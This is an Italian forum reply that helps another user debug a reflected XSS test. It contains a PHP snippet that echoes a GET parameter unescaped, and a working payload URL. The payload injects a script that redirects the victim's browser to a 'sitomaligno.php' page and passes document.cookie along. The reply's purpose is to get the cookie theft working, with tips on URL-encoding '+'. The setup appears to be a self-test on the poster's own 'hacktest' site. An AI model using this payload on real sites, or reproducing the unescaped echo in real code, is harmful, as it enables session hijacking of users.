scusa ma hai fatto un po' di debug per vedere cosa non funziona???

Prima di tutto io farei:
Codice PHP:
<?php
$var $_GET['message'];
echo stripslashes($var);
?>
nel caso ci fossero i magic quotes attivati... nell'url che passi ci sono dei doppi apici!

Per seconda cosa nell'url sostituisci + con %2b

codice:
http://theninjateam.altervista.org/...ss.php?message=<script>window.location="http://theninjateam.altervista.org/hacktest/xss/sitomaligno.php?data="%2bdocument.cookie</script>
Il + ha il significato di spazio vuoto nella codifica urlencode... e viene quindi sostituito... ma te ne rendi conto semplicemente visualizzando il codice html generato...